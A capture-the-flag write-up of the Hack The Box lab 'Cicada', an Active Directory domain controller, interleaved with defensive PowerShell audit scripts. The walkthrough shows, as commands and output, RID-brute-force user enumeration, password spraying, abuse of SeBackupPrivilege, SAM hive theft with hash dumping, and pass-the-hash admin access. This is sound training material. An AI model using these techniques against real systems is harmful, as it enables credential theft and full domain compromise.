
Hack The Box Write-Up Cicada


About Cicada

In this post, I'm writing a write-up for the machine Cicada from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

Cicada is an 'Easy' rated box. Grabbing and submitting the user.txt flag raises your points by 10, and submitting the root flag raises your points by 20.

Foothold

The port scan with Nmap shows some interesting open ports on this machine, such as 445/tcp (SMB). With the GUEST account we can read the file Notice from HR.txt, which reveals the default password that is used for new hires.

User

After enumerating the user accounts on this machine via rpcclient, we tried the default password on the accounts we found and discovered that it works for the user michael.wrightson. After running Bloodhound, we found the password of the user account david.orelious in the description field in Active Directory. This account has permission to access the DEV share, which holds Backup_script.ps1 containing the password of the user account emily.oscars. This user has permission to access the machine via WinRM and read the user flag.

Root

emily.oscars has the SeBackupPrivilege, which lets us read root.txt. After saving the SAM and SYSTEM hives and downloading them to our machine, we can dump the password hashes from the SAM. With the NT hash of the Administrator account we can connect to the machine over WinRM as that user and have the highest privileges on the machine.

Machine Info

Machine Name: Cicada
Difficulty: Easy
Points: 20
Release Date: 07 Nov 2020
IP: 10.129.231.149
Creator: theblxckcicada

Reconnaissance

Portscan with Nmap

As always, we start this machine with a portscan with Nmap.

nmap -sC -sV -oA ./nmap/10.129.231.149 10.129.231.149

The results of the Nmap portscan.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 05:23 CST         
Nmap scan report for 10.129.231.149                                                     
Host is up (0.075s latency).                                                            
Not shown: 989 filtered tcp ports (no-response)                                         
PORT     STATE SERVICE       VERSION                                                    
53/tcp   open  domain        Simple DNS Plus                                            
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-19 18:24:04Z)                                                                                                  
135/tcp  open  msrpc         Microsoft Windows RPC                                      
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                              
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)                                                                   
|_ssl-date: TLS randomness does not represent time                                      
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                    
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb                                                                                         
| Not valid before: 2024-08-22T20:24:16                                                 
|_Not valid after:  2025-08-22T20:24:16                                                 
445/tcp  open  microsoft-ds?                                                            
464/tcp  open  kpasswd5?                                                                
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                        
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)                                                                   
|_ssl-date: TLS randomness does not represent time                                      
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                    
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time                                      
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                    
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-19T18:24:48
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds

The results of the Nmap scan reveal several open ports on this machine. Judging by these ports, the machine acts as a Domain Controller for an Active Directory domain. The name of the machine is CICADA-DC.cicada.htb. The open SMB port 445/tcp is an interesting port to dive into during enumeration. The open RPC port 135/tcp and Kerberos on port 88/tcp also caught my eye. These ports are open by default on a Domain Controller and are useful for enumeration.

Enumeration

Enumerate SMB

Let's start with enumerating SMB. After some trying, we found that we can connect to SMB with the GUEST account and get a list of the shares.

smbmap -H cicada.htb -u "guest" -p ""

The shared folder HR is readable with the GUEST user account.

[+] IP: cicada.htb:445  Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 

Let’s connect to the HR shared folder.

smbclient //cicada.htb/HR --user guest --password ""

This share has one file with the name Notice from HR.txt. We can download this file to our machine and try to read the contents.

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 07:29:09 2024
  ..                                  D        0  Thu Mar 14 07:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 12:31:48 2024

                4168447 blocks of size 4096. 439288 blocks available
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (38.6 KiloBytes/sec) (average 38.6 KiloBytes/sec)

Now we are able to read the contents of this file.

cat Notice\ from\ HR.txt 
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Nice! We found the default password: Cicada$M6Corpb*@Lp#nZp!8. The next step is to get a list of user accounts that are listed on this machine and try this password for each account. I hope we can get lucky.

Enumerate user accounts

Let’s connect with the GUEST account with the rpcclient to the machine and let’s see if we can find some user accounts.

$ rpcclient --user GUEST --password="" cicada.htb

Let's see if we can look up the SID of the current user, so that we have the base SID (domain SID) for this environment.

rpcclient $> lookupnames GUEST
GUEST S-1-5-21-917908876-1423158569-3159038727-501 (User: 1)
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-500
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (1)
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-502
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (1)

We found three user accounts. With the current user we can enumerate RIDs to find out which user accounts exist on this machine. I wrote a small Bash script to enumerate the users based on their RID.

# Walk RIDs 500-4000 and resolve each SID with the GUEST account.
# rpcclient prints *unknown* for RIDs that do not exist, so filter
# those lines out and keep only the resolved CICADA\<name> entries.
for i in $(seq 500 4000); do
    rpcclient --user "GUEST" --password="" cicada.htb \
        -c "lookupsids S-1-5-21-917908876-1423158569-3159038727-$i" | grep -v "unknown";
done

After running the script, we found the following usernames:

john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Initial access

Access to Michael Wrightson

After some testing with smbmap we found that the default password works for the user michael.wrightson.

smbmap -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -H cicada.htb
[+] IP: cicada.htb:445  Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
root@htb-vbpxy0fxms:/home/t13nn3s/my_data# 

We first tried to establish a WinRM connection to this machine as michael.wrightson, but this user has no permission to do so.

Enumerate with Bloodhound

Since we have credentials to authenticate against the Active Directory we can run Bloodhound.

bloodhound-python --domain cicada.htb -c all -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -dc cicada-dc.cicada.htb -ns 10.129.231.149 --dns-tcp
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 02S

The user account emily.oscars is a member of the group REMOTE MANAGEMENT USERS@CICADA.HTB. This is interesting because members of this group have permission to log in to the machine with Remote Desktop Connection or with PowerShell Remoting.

[Screenshot: Bloodhound output]

After further analysis of the members of the group [email protected], we found the password aRt$Lp#7t*VQ!3 in the description field in Active Directory of the user account david.orelious.

[Screenshot: password of david.orelious in the Description field]
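From the defender's side, the two Bloodhound findings above (a password parked in the Description attribute, and WinRM access granted through Remote Management Users) are both easy to audit. The following PowerShell is an added example, not part of the write-up; it assumes the RSAT ActiveDirectory module and an account that can read user objects in the domain. The keyword list in $secretPattern is my own choice.

```powershell
# Added example: audit AD for secrets in free-text attributes and list who can
# reach the DC over WinRM. Assumes the RSAT ActiveDirectory module is installed.
Import-Module ActiveDirectory

# Words that usually indicate a credential left in a free-text attribute
# (assumed list; extend it for your environment).
$secretPattern = '(?i)pass|pwd|passwd|cred|secret|login'

function Find-SecretsInDescriptions {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    # Description and Info ("Notes") are readable by every authenticated user,
    # which is exactly how Bloodhound surfaced david.orelious' password.
    Get-ADUser -Filter * -SearchBase $SearchBase -Properties Description, Info |
        Where-Object { ("$($_.Description) $($_.Info)") -match $secretPattern } |
        Select-Object SamAccountName, Description, Info
}

function Get-RemoteManagementMembers {
    # 'Remote Management Users' is the built-in group that grants WinRM logon.
    Get-ADGroupMember -Identity 'Remote Management Users' -Recursive |
        Select-Object SamAccountName, objectClass
}

$hits = Find-SecretsInDescriptions
if ($hits) {
    Write-Warning 'Users with credential-looking text in Description/Info:'
    $hits | Format-Table -AutoSize
}
Write-Host 'Accounts able to log on to the DC over WinRM:'
Get-RemoteManagementMembers | Format-Table -AutoSize
```

Any account that shows up in the first table should have its password rotated and the attribute cleared; the second table should contain only accounts that genuinely need remote management of a Domain Controller.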

Access SMB as David Orelious

We already know that there are more SMB shares listed on this machine. Let’s see if the account david.orelious has access to a different share.

smbmap -H cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'

This account has read-only permission on the DEV share.

[+] IP: cicada.htb:445  Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     READ ONLY
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Let’s connect to the DEV share.

smbclient //cicada.htb/DEV --user david.orelious --password 'aRt$Lp#7t*VQ!3'

We found an interesting file Backup_script.ps1. Let’s download this script to our machine.

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

                4168447 blocks of size 4096. 424721 blocks available
smb: \> mget Backup_script.ps1 
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,9 KiloBytes/sec) (average 3,9 KiloBytes/sec)

Contents of the script.

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
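Note that the script never even uses $credentials; the password is simply lying in a file on a share that an unprivileged account can read, the same way the HR notice exposed the default password on the HR share. A defender can sweep the shares for exactly this pattern. The PowerShell below is an added example, not code from the box or the write-up; it assumes it runs on the file server with the SmbShare module available, and the regexes are my own.

```powershell
# Added example: scan the paths behind every non-administrative SMB share on
# this host for scripts and text files that embed plaintext credentials.
# Assumes it runs locally on the file server (Get-SmbShare needs that).

# Patterns (assumed, extend as needed). The first one matches the exact idiom
# used in Backup_script.ps1; the last one also catches the HR notice's
# "Your default password is: ..." line.
$credentialPatterns = @(
    'ConvertTo-SecureString\s+["''][^"'']+["'']\s+-AsPlainText',
    '\$(password|passwd|pwd)\s*=\s*["''][^"'']+["'']',
    '(?i)\b(password|passwd|pwd)(\s+is)?\s*[:=]\s*\S+'
)
$fileTypes = @('*.ps1','*.psm1','*.bat','*.cmd','*.vbs','*.txt','*.xml','*.config','*.ini')

function Find-PlaintextCredentials {
    param([Parameter(Mandatory)][string[]]$Path)
    Get-ChildItem -Path $Path -Recurse -File -Include $fileTypes -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            Select-String -Path $file.FullName -Pattern $credentialPatterns -ErrorAction SilentlyContinue |
                ForEach-Object {
                    [pscustomobject]@{
                        File  = $file.FullName
                        Line  = $_.LineNumber
                        Match = $_.Line.Trim()
                    }
                }
        }
}

# Only user-created shares; skip ADMIN$, C$, IPC$ and the other special shares.
$shareRoots = Get-SmbShare | Where-Object { -not $_.Special -and $_.Path } |
    Select-Object -ExpandProperty Path

$findings = Find-PlaintextCredentials -Path $shareRoots
if ($findings) {
    Write-Warning "Plaintext credentials found on $($shareRoots.Count) share path(s):"
    $findings | Format-Table -AutoSize
} else {
    Write-Host 'No plaintext credential patterns found on shared paths.'
}
```

Every hit is a secret to rotate; the backup job itself should run as a managed service account (or load a DPAPI-protected credential with Import-Clixml) rather than carry a password in the script.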

We found the password of the user account emily.oscars in this script. We already know that this user account is a member of REMOTE MANAGEMENT USERS@CICADA.HTB.

Evil-WinRM access as Emily Oscars

Read the user flag

Let’s try to establish a connection with Evil-WinRM with the machine.

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb

We have the user flag.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ls


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/30/2024   9:29 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
ce92f2c2963fea6d4308b59a36eb2dae
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>

Privilege Escalation

Enumeration

The user account emily.oscars has the SeBackupPrivilege. The SeBackupPrivilege is a Windows privilege that provides a user or process with the ability to read files and directories, regardless of the security settings on those objects. This privilege can be used by certain backup programs or processes that require the capability to back up or copy files that would not normally be accessible to the user.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
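Because SeBackupPrivilege bypasses file ACLs outright, a defender should know exactly which principals hold it on a Domain Controller (by default only Administrators, Backup Operators and Server Operators) and who sits in those groups. The PowerShell below is an added example, not from the write-up; it assumes an elevated session on the DC, uses secedit's INI export of the effective policy, and treats the three built-in group SIDs as the expected baseline.

```powershell
# Added example: report who holds SeBackupPrivilege / SeRestorePrivilege on
# this host and flag anything outside the default baseline. Run elevated.

# Default holders on a Domain Controller (assumed baseline):
# Administrators, Backup Operators, Server Operators.
$baselineSids = @('S-1-5-32-544', 'S-1-5-32-551', 'S-1-5-32-549')

function Get-UserRightAssignment {
    param([string[]]$Right = @('SeBackupPrivilege', 'SeRestorePrivilege'))
    # secedit writes the effective policy as an INI file; the [Privilege Rights]
    # section lists each right as  SeBackupPrivilege = *SID,*SID
    $cfg = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $lines = Get-Content -Path $cfg
    Remove-Item -Path $cfg -ErrorAction SilentlyContinue

    foreach ($r in $Right) {
        $line = $lines | Where-Object { $_ -match "^\s*$r\s*=" } | Select-Object -First 1
        if (-not $line) { continue }
        $sids = ($line -split '=', 2)[1] -split ',' |
            ForEach-Object { $_.Trim().TrimStart('*') } | Where-Object { $_ }
        foreach ($sid in $sids) {
            $name = $sid
            try {
                $name = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                    Translate([System.Security.Principal.NTAccount]).Value
            } catch { }   # unresolvable SID: keep the raw value
            [pscustomobject]@{
                Right     = $r
                Principal = $name
                Sid       = $sid
                Baseline  = ($baselineSids -contains $sid)
            }
        }
    }
}

$assignments = Get-UserRightAssignment
$assignments | Format-Table -AutoSize

$extra = $assignments | Where-Object { -not $_.Baseline }
if ($extra) { Write-Warning "Non-default holders of backup/restore rights: $($extra.Principal -join ', ')" }

# On a DC the built-in groups are domain objects, so expand their membership.
# This is where an account such as emily.oscars would show up.
foreach ($grp in ($assignments | Where-Object { $_.Baseline } | Select-Object -Unique Principal)) {
    $groupName = $grp.Principal.Split('\')[-1]
    Write-Host "Members of ${groupName}:"
    Get-ADGroupMember -Identity $groupName -Recursive |
        Select-Object SamAccountName, objectClass | Format-Table -AutoSize
}
```

Membership of Backup Operators or Server Operators on a Domain Controller is effectively a path to Domain Admin, as the rest of this write-up shows, so every member listed here deserves the same scrutiny as a Domain Admin.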

We can download the files from this GitHub repo: https://github.com/giuliano108/SeBackupPrivilege, and upload them to the machine.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll
                                        
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeCmdLets.dll
                                        
Data: 16384 bytes of 16384 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll
                                        
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeUtils.dll
                                        
Data: 21844 bytes of 21844 bytes copied
                                        
Info: Upload successful!

Read the root flag

Import the PowerShell modules and copy root.txt using the backup privilege.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege 'C:\users\administrator\desktop\root.txt' .\root.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type root.txt
9668a9dbfd79509169398cbe43f4151a

We have read the root flag. That's nice, but that's not the same as owning the machine. So, we still have to escalate our privileges.

Download SYSTEM and SAM

Save the SYSTEM and SAM hives and download them to our machine.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!

With secretsdump we can dump the password hashes.

impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

With the NT hash of the Administrator account we are able to establish a connection to the machine with Evil-WinRM (pass-the-hash).

─[eu-dedivip-1]─[10.10.14.38]─[t13nn3s@htb-j5kiqrdxs4]─[~/my_data]
└──╼ [★]$ evil-winrm -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
3cbbc6b21aaa327e9f98355c30e09de5
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

We have owned CICADA!

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.